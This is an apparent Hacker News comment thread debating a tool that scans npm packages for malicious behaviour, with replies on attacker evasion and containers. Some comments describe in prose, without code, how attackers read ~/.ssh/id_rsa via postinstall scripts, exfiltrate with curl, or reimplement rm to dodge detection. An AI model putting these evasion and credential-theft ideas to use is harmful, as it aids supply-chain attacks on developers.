top | item 47134602

(no title)

Once this or something like it becomes widespread, won't sophisticated attackers simply test their attacks against this? So, for example, if it checks for `rm` invocations, just implemented the functionally of `rm` in the malware, or if it checks for exfiltration of data, then shell out to curl to do that in a different process.

If you think of making it so robust that this is impossible, you're just describing a container, which we already have.

discuss

ComCat|5 days ago

You're describing two different things,

The container comparison misses where these attacks actually happen. Containers limit what code can do at runtime. We flag what code intends to do before it ever runs. These are complementary. A container won't stop a postinstall script from reading ~/.ssh/id_rsa and posting it to an attacker's server if your CI environment has network access and a mounted home directory — which most do.

Yes sophisticated attackers adapt. But the current state of npm supply chain attacks is that most don't even try to evade — because nobody's looking at the code. Every major attack in 2025 used the same playbook: credential theft + network exfil + install script abuse. Raising the floor from "zero analysis" to "26 behavioral detectors with cross-signal correlation" eliminates the entire class of low effort attacks and forces the rest into increasingly constrained patterns.

groundzeros2015|5 days ago

This. The real problems are arbitrary pre-install scripts and a culture of not knowing what’s in the dependency tree

cyanydeez|5 days ago

No, sophisticated attackers will make their own toolchain to catch all the other attackers, _Except themselves_.